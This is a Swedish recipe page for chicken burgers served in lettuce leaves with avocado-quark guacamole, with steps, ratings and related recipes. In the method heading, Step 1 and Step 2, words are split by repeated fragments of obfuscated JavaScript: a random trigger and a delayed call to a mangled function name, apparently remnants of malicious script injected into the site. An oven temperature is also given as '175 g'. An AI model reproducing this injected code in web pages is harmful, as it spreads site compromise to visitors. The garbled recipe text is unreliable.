Kycklingburgare med Guacamole

2013-05-27
imageimage
  • Yield : 4
  • Servings : 2
  • Prep Time : 10m
  • Cook Time : 15m
  • Ready In : 25m

Ingredienser

• 400 g Kycklingfärs
• 200 g Kvarg
• 1 Avokado
• 2 Tomater
• 1 Gul Paprika
• Salladsblad
• Salt, Peppar, Vitlök & Chilipeppar

Genomförandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e

Steg 1

Blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a kycklingfärsen med två klyftor pressad vitlök
och lite av de övriga kryddorna i en skål.
Forma färsen till biffar och stek på mellanteperatur.
Låt stå i ugnen i ca 7-10 min på 175 g

Steg 2

Guacamole

Mosa avokadon med en gaffel
Finhacka en tomat och blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a med avokadon.
Tillsätt kvarg och pressa ner två klyftor vitlök
Krydda med lite salt och peppar

Steg 3

Använd salladsbladen istället för bröd
Fyll den med skivad tomat, paprika och guacamole

Medlemsbetyg

(4.5 / 5)

4.5 5 2
Betygsätt recept

2 people rated this recipe

Related Recipes:
  • Nutellapannkakor

    Nutellapannkakor

  • _SAM0905

    Sallad på svartvitlöks rostad pumpa, lök, paprika, tomat med chevreost, spenat och svartkålschips.

  • _SAM0920

    Svartvitlöks rostad kyckling

  • _SAM0671

    Sremska korv med rostad gulbeta, potatis, sparris, spenat, svartvitlök med fetaostkräm

  • Avokado & äggmacka

    Avokado & äggmacka

Recipe Comments

Post A Comment

Current ye@r *